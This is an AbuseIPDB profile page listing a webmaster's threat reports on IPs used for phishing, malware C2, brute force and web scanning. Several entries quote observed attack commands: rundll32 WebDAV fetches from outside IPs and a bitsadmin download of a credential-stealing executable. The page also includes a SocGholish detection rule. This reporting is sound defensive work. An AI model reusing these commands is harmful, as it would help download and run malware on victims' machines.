cybercrypto.net - AbuseIPDB User Profile

JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

The webmaster of cybercrypto.net joined AbuseIPDB in April 2021 and has reported 25 IP addresses.

Standing (weight) is good.

INACTIVE USER WEBMASTER SUPPORTER

IP	Date	Comment	Categories
🇺🇸 172.67.168.192	01 Oct 2023	Targeted phishing - erq1pwhs7bapqkfco0zc.v7hsd6z.ru/nk20/#<username redacted>	Phishing
🇺🇸 63.250.47.220	08 Sep 2023	63.250.47.220 - IP address used after DocuSign phishing Hostnames: agent-industry.qua ... show more 63.250.47.220 - IP address used after DocuSign phishing Hostnames: agent-industry.quarantine-pnap-vlan51.web-hosting.com City: Phoenix Country: United States Organization: Namecheap, Inc. Updated: 2023-09-08T15:48:26.526006 Number of open ports: 3 Ports: 22/tcp OpenSSH (8.2p1 Ubuntu-4ubuntu0.1) 111/tcp 443/tcp \|-- SSL Versions: -SSLv2, -SSLv3, -TLSv1, -TLSv1.1, TLSv1.2, TLSv1.3 show less	Phishing
🇩🇪 159.100.9.129	22 Aug 2023	Hosting fake phishing pages for credential harvesting	Phishing
🇺🇸 185.252.179.64	02 Aug 2023	rundll32.exe C:\windows\system32\davclnt.dll,DavSetCookie 185.252.179.64@80 http://185.252.179.64/Do ... show more rundll32.exe C:\windows\system32\davclnt.dll,DavSetCookie 185.252.179.64@80 http://185.252.179.64/Downloads tags MITRE.T1048.003 - Exfiltration Over Unencrypted Non-C2 Protocol CUSTOM.WEBDA XSAE.F6596 - Suspicious WebDav Client Execution XCUS.CF0027 - XSAE.F6596 with Exclusions Malicious WebDav connection show less	Web Spam Hacking Exploited Host Web App Attack
🇩🇪 172.86.68.194	01 Aug 2023	Abuse of WebDav - rundll32.exe C:\windows\system32\davclnt.dll,DavSetCookie 172.86.68.194@80 http:// ... show more Abuse of WebDav - rundll32.exe C:\windows\system32\davclnt.dll,DavSetCookie 172.86.68.194@80 http://172.86.68.194/4496 show less	Hacking Bad Web Bot Exploited Host Web App Attack
🇺🇸 104.21.21.187	25 Jul 2023	uses bitsadmin.exe for transfer of files where AutoIT is download and and executable is placed on th ... show more uses bitsadmin.exe for transfer of files where AutoIT is download and and executable is placed on the users machine for credential theft - "objectCmd": "\"C:\\Windows\\System32\\spool\\drivers\\color\\bitsadmin.exe\" /transfer 57788183549 /priority foreground http://6eiew7.kualalumpur.sa.com/?46438115163628734 \"C:\\WinSysUpdate70382965573\\Oracle.IdeaPad.07453.8192.344.exe\"" show less	Phishing Bad Web Bot Web App Attack
🇫🇷 193.29.104.42	29 Apr 2023	Open sourced Emerging Threats Rule for SocGholish alert dns $HOME_NET any -> any any (msg:"ET MALWA ... show more Open sourced Emerging Threats Rule for SocGholish alert dns $HOME_NET any -> any any (msg:"ET MALWARE SocGholish CnC Domain in DNS Lookup (* .lap .detroitdragway .com)"; dns.query; dotprefix; content:".lap.detroitdragway.com"; show less	DNS Compromise Hacking Web App Attack
🇺🇸 64.227.85.27	11 Mar 2023	Brute force on WordPress login Firefox March 11 64.227.85.27 Windows 131 —Unknown Login Page	Web App Attack
🇸🇬 52.74.160.38	01 Mar 2023	Being used for phishing and credential harvesting - nginx server hosting a registration app with for ... show more Being used for phishing and credential harvesting - nginx server hosting a registration app with forged company logo show less	Phishing
🇷🇺 193.106.191.187	21 Feb 2023	C&C callback for SharpHound powershell infection that was as a result of a user clicking on an infec ... show more C&C callback for SharpHound powershell infection that was as a result of a user clicking on an infected word document show less	Hacking Exploited Host
🇺🇸 63.251.106.25	23 Jan 2023	Andromeda / Gamarue C2	Hacking
🇧🇪 35.205.61.67	13 Jan 2023	Andromeda C2	Hacking Exploited Host
🇳🇱 37.220.87.24	11 Jan 2023	Outgoing connection from installutil.exe, Microsoft® .NET Framework 4.0.30319.0 ( TCP Port 49275 to ... show more Outgoing connection from installutil.exe, Microsoft® .NET Framework 4.0.30319.0 ( TCP Port 49275 to http://37.220.87.24/1902 ( 37.220.87.24 Port 80 ) . Being used as a C2 - exploits installutil with is .NET Framework tools show less	Hacking
🇮🇩 103.136.58.146	06 Jan 2023	Used for mail transport in sending in fake sextortion emails	Phishing Email Spam
🇺🇸 23.219.2.150	28 Sep 2022	serving up a phishing page : www.principalcdn.com canonical name = www.principalcdn.com.edgeke ... show more serving up a phishing page : www.principalcdn.com canonical name = www.principalcdn.com.edgekey.net. www.principalcdn.com.edgekey.net canonical name = e25997.b.akamaiedge.net. Name: e25997.b.akamaiedge.net Address: 23.219.2.155 Name: e25997.b.akamaiedge.net Address: 23.219.2.150 <link href="https://www.principalcdn.com/css/principal-design-system/core/v8/core.min.css" rel="stylesheet" /> <link rel="stylesheet" href="https://login.principal.com/secure/style/login.css" /> <link rel="stylesheet" href="https://login.principal.com/secure/style/login-pds.css" /> <link href="https://www.principalcdn.com/css/principal-design-system/navigationPrimary/v6/navigationPrimary.min.css" rel="stylesheet" /> <link href="https://www.principalcdn.com/css/principal-design-system/labeledInput/v3/labeledInput.min.css" rel="stylesheet" /> <link href="https://www.principalcdn.com/css/principal-design-system/erroredInput/v4/erroredInput.min.css" rel="stylesheet" /> show less	Phishing
🇺🇸 23.219.2.155	28 Sep 2022	serving up a phishing page : www.principalcdn.com canonical name = www.principalcdn.com.edgeke ... show more serving up a phishing page : www.principalcdn.com canonical name = www.principalcdn.com.edgekey.net. www.principalcdn.com.edgekey.net canonical name = e25997.b.akamaiedge.net. Name: e25997.b.akamaiedge.net Address: 23.219.2.155 Name: e25997.b.akamaiedge.net Address: 23.219.2.150 <link href="https://www.principalcdn.com/css/principal-design-system/core/v8/core.min.css" rel="stylesheet" /> <link rel="stylesheet" href="https://login.principal.com/secure/style/login.css" /> <link rel="stylesheet" href="https://login.principal.com/secure/style/login-pds.css" /> <link href="https://www.principalcdn.com/css/principal-design-system/navigationPrimary/v6/navigationPrimary.min.css" rel="stylesheet" /> <link href="https://www.principalcdn.com/css/principal-design-system/labeledInput/v3/labeledInput.min.css" rel="stylesheet" /> <link href="https://www.principalcdn.com/css/principal-design-system/erroredInput/v4/erroredInput.min.css" rel="stylesheet" /> show less	Phishing
🇺🇸 172.67.204.65	28 Sep 2022	Hosting a phishing page for MS 365 credentials - domain : harrisonmouth.buzz Name: harrisonmout ... show more Hosting a phishing page for MS 365 credentials - domain : harrisonmouth.buzz Name: harrisonmouth.buzz Address: 104.21.85.95 Name: harrisonmouth.buzz Address: 172.67.204.65 Name: harrisonmouth.buzz Address: 2606:4700:3034::6815:555f Name: harrisonmouth.buzz Address: 2606:4700:3037::ac43:cc41 show less	Phishing
🇺🇸 104.21.85.95	28 Sep 2022	hosting a phishing page for MS 365 credentials	Phishing
🇨🇳 106.52.141.198	26 Sep 2021	Last Visit Date 09/23/21 Last Visit Time 03:34 AM Last Page Visited /xmlrpc.php	Hacking Web App Attack
🇺🇸 207.241.230.131	26 Sep 2021	+ − Leaflet \| Map tiles by Stamen Design, under CC BY 3.0. Data by OpenStreetMap, under ODbL. Las ... show more + − Leaflet \| Map tiles by Stamen Design, under CC BY 3.0. Data by OpenStreetMap, under ODbL. Last Visit Date 09/23/21 Last Visit Time 11:09 AM Last Page Visited /wp-content/uploads/bb-plugin/cache/156-layout.css?ver=2983ee6702e04c548680f6 show less	Web App Attack
🇮🇩 180.251.128.59	26 Sep 2021	Last Visit Date 09/23/21 Last Visit Time 11:43 AM Last Page Visited /misc/ajax.js	Web App Attack
🇳🇱 85.203.44.76	26 Sep 2021	Last Visit Date 09/25/21 Last Visit Time 05:28 PM Last Page Visited /back/bak.zip	Web App Attack
176.111.173.252	19 May 2021	May 17 8:15pm – 8:45pm (~2.5k requests) May 18 5:30am – 6am (~2.5k requests)	DDoS Attack
152.165.124.204	05 May 2021	multiple compromised users coming from this IP address as well fake credit orders placed.	Fraud Orders
39.103.221.53	05 May 2021	Last Page Visited https://cybercrypto.net/data/admin/allowurl.txt	Web App Attack